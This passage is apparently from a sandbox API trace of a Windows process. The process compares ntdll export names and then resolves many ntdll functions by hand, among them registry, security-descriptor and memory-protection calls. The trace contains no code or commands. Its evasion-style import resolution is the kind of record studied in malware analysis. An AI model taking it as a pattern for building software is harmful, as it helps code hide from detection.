(lpString1="CsrAllocateMessagePointer", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.989] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.989] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.989] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.989] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.989] lstrcmpA (lpString1="CsrClientCallServer", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.989] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.989] lstrcmpA (lpString1="CsrFreeCaptureBuffer", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.989] lstrcmpA (lpString1="CsrGetProcessId", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.989] lstrcmpA (lpString1="CsrIdentifyAlertableThread", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.989] lstrcmpA (lpString1="CsrSetPriorityClass", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.989] lstrcmpA (lpString1="CsrVerifyRegion", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.989] lstrcmpA (lpString1="DbgBreakPoint", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.990] lstrcmpA (lpString1="DbgPrint", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.990] lstrcmpA (lpString1="DbgPrintEx", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.990] lstrcmpA (lpString1="DbgPrintReturnControlC", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.990] lstrcmpA (lpString1="DbgPrompt", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.990] lstrcmpA (lpString1="DbgQueryDebugFilterState", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.990] lstrcmpA (lpString1="DbgSetDebugFilterState", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.990] lstrcmpA (lpString1="DbgUiConnectToDbg", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.990] lstrcmpA (lpString1="DbgUiContinue", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.990] lstrcmpA (lpString1="DbgUiConvertStateChangeStructure", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.990] lstrcmpA (lpString1="DbgUiDebugActiveProcess", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.990] lstrcmpA (lpString1="DbgUiGetThreadDebugObject", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.990] lstrcmpA (lpString1="DbgUiIssueRemoteBreakin", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.990] lstrcmpA (lpString1="DbgUiRemoteBreakin", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.990] lstrcmpA (lpString1="DbgUiSetThreadDebugObject", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.990] lstrcmpA (lpString1="DbgUiStopDebugging", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.990] lstrcmpA (lpString1="DbgUiWaitStateChange", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.990] lstrcmpA (lpString1="DbgUserBreakPoint", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.990] lstrcmpA (lpString1="EtwCreateTraceInstanceId", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.990] lstrcmpA (lpString1="EtwDeliverDataBlock", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.990] lstrcmpA (lpString1="EtwEnumerateProcessRegGuids", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.990] lstrcmpA (lpString1="EtwEventActivityIdControl", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.990] lstrcmpA (lpString1="EtwEventEnabled", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.990] lstrcmpA (lpString1="EtwEventProviderEnabled", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.990] lstrcmpA (lpString1="EtwEventRegister", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.990] lstrcmpA (lpString1="EtwEventUnregister", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.990] lstrcmpA (lpString1="EtwEventWrite", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.990] lstrcmpA (lpString1="EtwEventWriteEndScenario", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.990] lstrcmpA (lpString1="EtwEventWriteEx", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.990] lstrcmpA (lpString1="EtwEventWriteFull", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.990] lstrcmpA (lpString1="EtwEventWriteNoRegistration", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.990] lstrcmpA (lpString1="EtwEventWriteStartScenario", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.990] lstrcmpA (lpString1="EtwEventWriteString", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.991] lstrcmpA (lpString1="EtwEventWriteTransfer", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.991] lstrcmpA (lpString1="EtwGetTraceEnableFlags", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.991] lstrcmpA (lpString1="EtwGetTraceEnableLevel", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.991] lstrcmpA (lpString1="EtwGetTraceLoggerHandle", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.991] lstrcmpA (lpString1="EtwLogTraceEvent", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.991] lstrcmpA (lpString1="EtwNotificationRegister", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.991] lstrcmpA (lpString1="EtwNotificationUnregister", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.991] lstrcmpA (lpString1="EtwProcessPrivateLoggerRequest", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.991] lstrcmpA (lpString1="EtwRegisterSecurityProvider", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.991] lstrcmpA (lpString1="EtwRegisterTraceGuidsA", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.991] lstrcmpA (lpString1="EtwRegisterTraceGuidsW", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.991] lstrcmpA (lpString1="EtwReplyNotification", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.991] lstrcmpA (lpString1="EtwSendNotification", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.991] lstrcmpA (lpString1="EtwSetMark", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.991] lstrcmpA (lpString1="EtwTraceEventInstance", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.991] lstrcmpA (lpString1="EtwTraceMessage", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.991] lstrcmpA (lpString1="EtwTraceMessageVa", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.991] lstrcmpA (lpString1="EtwUnregisterTraceGuids", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.991] lstrcmpA (lpString1="EtwWriteUMSecurityEvent", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.991] lstrcmpA (lpString1="EtwpCreateEtwThread", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.991] lstrcmpA (lpString1="EtwpGetCpuSpeed", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.991] lstrcmpA (lpString1="EtwpNotificationThread", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.991] lstrcmpA (lpString1="EvtIntReportAuthzEventAndSourceAsync", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.991] lstrcmpA (lpString1="EvtIntReportEventAndSourceAsync", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.991] lstrcmpA (lpString1="ExpInterlockedPopEntrySListEnd", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.991] lstrcmpA (lpString1="ExpInterlockedPopEntrySListFault", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.991] lstrcmpA (lpString1="ExpInterlockedPopEntrySListResume", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.991] lstrcmpA (lpString1="KiFastSystemCall", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.991] lstrcmpA (lpString1="KiFastSystemCallRet", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.991] lstrcmpA (lpString1="KiIntSystemCall", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.991] lstrcmpA (lpString1="KiRaiseUserExceptionDispatcher", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.991] lstrcmpA (lpString1="KiUserApcDispatcher", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.991] lstrcmpA (lpString1="KiUserCallbackDispatcher", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.992] lstrcmpA (lpString1="KiUserExceptionDispatcher", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.992] lstrcmpA (lpString1="LdrAccessResource", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.992] lstrcmpA (lpString1="LdrAddLoadAsDataTable", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.992] lstrcmpA (lpString1="LdrAddRefDll", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.992] lstrcmpA (lpString1="LdrDisableThreadCalloutsForDll", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.992] lstrcmpA (lpString1="LdrEnumResources", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.992] lstrcmpA (lpString1="LdrEnumerateLoadedModules", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.992] lstrcmpA (lpString1="LdrFindEntryForAddress", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.992] lstrcmpA (lpString1="LdrFindResourceDirectory_U", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.992] lstrcmpA (lpString1="LdrFindResourceEx_U", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.992] lstrcmpA (lpString1="LdrFindResource_U", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.992] lstrcmpA (lpString1="LdrFlushAlternateResourceModules", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.992] lstrcmpA (lpString1="LdrGetDllHandle", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.992] lstrcmpA (lpString1="LdrGetDllHandleByMapping", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.992] lstrcmpA (lpString1="LdrGetDllHandleByName", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.992] lstrcmpA (lpString1="LdrGetDllHandleEx", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.992] lstrcmpA (lpString1="LdrGetFailureData", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.992] lstrcmpA (lpString1="LdrGetFileNameFromLoadAsDataTable", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.992] lstrcmpA (lpString1="LdrGetProcedureAddress", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.992] lstrcmpA (lpString1="LdrGetProcedureAddressEx", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.992] lstrcmpA (lpString1="LdrHotPatchRoutine", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.992] lstrcmpA (lpString1="LdrInitShimEngineDynamic", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.992] lstrcmpA (lpString1="LdrInitializeThunk", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.992] lstrcmpA (lpString1="LdrLoadAlternateResourceModule", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.992] lstrcmpA (lpString1="LdrLoadAlternateResourceModuleEx", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.992] lstrcmpA (lpString1="LdrLoadDll", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.992] lstrcmpA (lpString1="LdrLockLoaderLock", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.992] lstrcmpA (lpString1="LdrOpenImageFileOptionsKey", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.992] lstrcmpA (lpString1="LdrProcessRelocationBlock", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0198.993] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x326f984, Source="ntdll.dll" | out: Destination="ntdll.dll") returned 1 [0198.993] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ntdll.dll", BaseAddress=0x326f9a4 | out: BaseAddress=0x326f9a4*=0x76fa0000) returned 0x0 [0198.993] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="NtOpenKey" | out: DestinationString="NtOpenKey") [0198.994] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="NtOpenKey", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fbfa18) returned 0x0 [0198.994] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="wcscat_s" | out: DestinationString="wcscat_s") [0199.026] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="wcscat_s", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fe89aa) returned 0x0 [0199.026] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="wcscpy_s" | out: DestinationString="wcscpy_s") [0199.026] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="wcscpy_s", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fd86a6) returned 0x0 [0199.026] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="NtEnumerateKey" | out: DestinationString="NtEnumerateKey") [0199.027] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="NtEnumerateKey", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fbfd3c) returned 0x0 [0199.027] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlOpenCurrentUser" | out: DestinationString="RtlOpenCurrentUser") [0199.027] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlOpenCurrentUser", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76ffb06f) returned 0x0 [0199.027] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlFreeHeap" | out: DestinationString="RtlFreeHeap") [0199.027] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlFreeHeap", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fcdf85) returned 0x0 [0199.027] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlAllocateHeap" | out: DestinationString="RtlAllocateHeap") [0199.027] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlAllocateHeap", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fce026) returned 0x0 [0199.027] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="memcpy" | out: DestinationString="memcpy") [0199.027] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="memcpy", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fc2340) returned 0x0 [0199.027] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="memset" | out: DestinationString="memset") [0199.028] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="memset", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fcdf20) returned 0x0 [0199.028] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlEnterCriticalSection" | out: DestinationString="RtlEnterCriticalSection") [0199.028] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlEnterCriticalSection", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fc22b0) returned 0x0 [0199.028] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlLeaveCriticalSection" | out: DestinationString="RtlLeaveCriticalSection") [0199.028] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlLeaveCriticalSection", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fc2270) returned 0x0 [0199.028] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlUnicodeToMultiByteN" | out: DestinationString="RtlUnicodeToMultiByteN") [0199.028] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlUnicodeToMultiByteN", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fd692e) returned 0x0 [0199.028] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlMultiByteToUnicodeN" | out: DestinationString="RtlMultiByteToUnicodeN") [0199.029] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlMultiByteToUnicodeN", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fce545) returned 0x0 [0199.029] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlReleaseActivationContext" | out: DestinationString="RtlReleaseActivationContext") [0199.029] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlReleaseActivationContext", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fdbb43) returned 0x0 [0199.029] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlFindActivationContextSectionString" | out: DestinationString="RtlFindActivationContextSectionString") [0199.029] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlFindActivationContextSectionString", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fcec78) returned 0x0 [0199.029] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlDeactivateActivationContextUnsafeFast" | out: DestinationString="RtlDeactivateActivationContextUnsafeFast") [0199.029] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlDeactivateActivationContextUnsafeFast", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fc2159) returned 0x0 [0199.029] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlActivateActivationContextUnsafeFast" | out: DestinationString="RtlActivateActivationContextUnsafeFast") [0199.029] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlActivateActivationContextUnsafeFast", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fc21f1) returned 0x0 [0199.029] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="wcstol" | out: DestinationString="wcstol") [0199.030] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="wcstol", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76feb4ca) returned 0x0 [0199.030] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="NtQueryInformationProcess" | out: DestinationString="NtQueryInformationProcess") [0199.030] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="NtQueryInformationProcess", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fbfac8) returned 0x0 [0199.030] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="NtQuerySecurityObject" | out: DestinationString="NtQuerySecurityObject") [0199.030] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="NtQuerySecurityObject", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fc1518) returned 0x0 [0199.030] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="NtSetSecurityObject" | out: DestinationString="NtSetSecurityObject") [0199.030] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="NtSetSecurityObject", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fc1b8c) returned 0x0 [0199.030] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlFreeUnicodeString" | out: DestinationString="RtlFreeUnicodeString") [0199.030] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlFreeUnicodeString", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fce126) returned 0x0 [0199.030] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlAnsiStringToUnicodeString" | out: DestinationString="RtlAnsiStringToUnicodeString") [0199.031] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlAnsiStringToUnicodeString", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fce6b5) returned 0x0 [0199.031] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlInitAnsiString" | out: DestinationString="RtlInitAnsiString") [0199.031] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlInitAnsiString", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fce1d0) returned 0x0 [0199.031] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlCreateUnicodeStringFromAsciiz" | out: DestinationString="RtlCreateUnicodeStringFromAsciiz") [0199.031] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlCreateUnicodeStringFromAsciiz", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fd83fc) returned 0x0 [0199.032] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlQueryInformationActiveActivationContext" | out: DestinationString="RtlQueryInformationActiveActivationContext") [0199.032] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlQueryInformationActiveActivationContext", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fe23fa) returned 0x0 [0199.039] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="_vsnwprintf" | out: DestinationString="_vsnwprintf") [0199.040] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="_vsnwprintf", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76feef93) returned 0x0 [0199.043] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="NtVdmControl" | out: DestinationString="NtVdmControl") [0199.043] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="NtVdmControl", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fc1ed8) returned 0x0 [0199.327] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="wcstoul" | out: DestinationString="wcstoul") [0199.327] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="wcstoul", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x77075816) returned 0x0 [0199.327] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="NtOpenDirectoryObject" | out: DestinationString="NtOpenDirectoryObject") [0199.327] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="NtOpenDirectoryObject", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fc00ec) returned 0x0 [0199.327] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="NtDeleteValueKey" | out: DestinationString="NtDeleteValueKey") [0199.328] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="NtDeleteValueKey", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fc0a34) returned 0x0 [0199.328] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="NtSetValueKey" | out: DestinationString="NtSetValueKey") [0199.328] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="NtSetValueKey", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fc01b4) returned 0x0 [0199.328] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="NtCreateKey" | out: DestinationString="NtCreateKey") [0199.328] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="NtCreateKey", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fbfb30) returned 0x0 [0199.328] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="NtYieldExecution" | out: DestinationString="NtYieldExecution") [0199.328] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="NtYieldExecution", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fbff2c) returned 0x0 [0199.328] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlIsThreadWithinLoaderCallout" | out: DestinationString="RtlIsThreadWithinLoaderCallout") [0199.328] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlIsThreadWithinLoaderCallout", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fe241f) returned 0x0 [0199.329] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="_wcsicmp" | out: DestinationString="_wcsicmp") [0199.329] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="_wcsicmp", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fd9337) returned 0x0 [0199.329] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="_stricmp" | out: DestinationString="_stricmp") [0199.329] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="_stricmp", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fdc7b9) returned 0x0 [0199.329] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlGetIntegerAtom" | out: DestinationString="RtlGetIntegerAtom") [0199.329] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlGetIntegerAtom", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fe23cf) returned 0x0 [0199.329] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="NtProtectVirtualMemory" | out: DestinationString="NtProtectVirtualMemory") [0199.329] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="NtProtectVirtualMemory", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fc0028) returned 0x0 [0199.329] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlRetrieveNtUserPfn" | out: DestinationString="RtlRetrieveNtUserPfn") [0199.330] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlRetrieveNtUserPfn", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76ffaabd) returned 0x0 [0199.330] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlInitializeNtUserPfn" | out: DestinationString="RtlInitializeNtUserPfn") [0199.330] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlInitializeNtUserPfn", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76ff3812) returned 0x0 [0199.330] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlDeleteCriticalSection" | out: DestinationString="RtlDeleteCriticalSection") [0199.330] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlDeleteCriticalSection", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fd45f5) returned 0x0 [0199.330] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="NtQuerySystemInformation" | out: DestinationString="NtQuerySystemInformation") [0199.330] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="NtQuerySystemInformation", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fbfda0) returned 0x0 [0199.330] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="RtlInitializeCriticalSection" | out: DestinationString="RtlInitializeCriticalSection") [0199.330] LdrGetProcedureAddress (in: BaseAddress=0x76fa0000, Name="RtlInitializeCriticalSection", Ordinal=0x0, ProcedureAddress=0x326f99c | out: ProcedureAddress=0x326f99c*=0x76fd2c42) returned 0x0 [0199.330] RtlInitAnsiString (in: DestinationString=0x326f97c, SourceString="_allshr" | out: DestinationString="_allshr") [0199.331] LdrGetProcedureAddress (in: 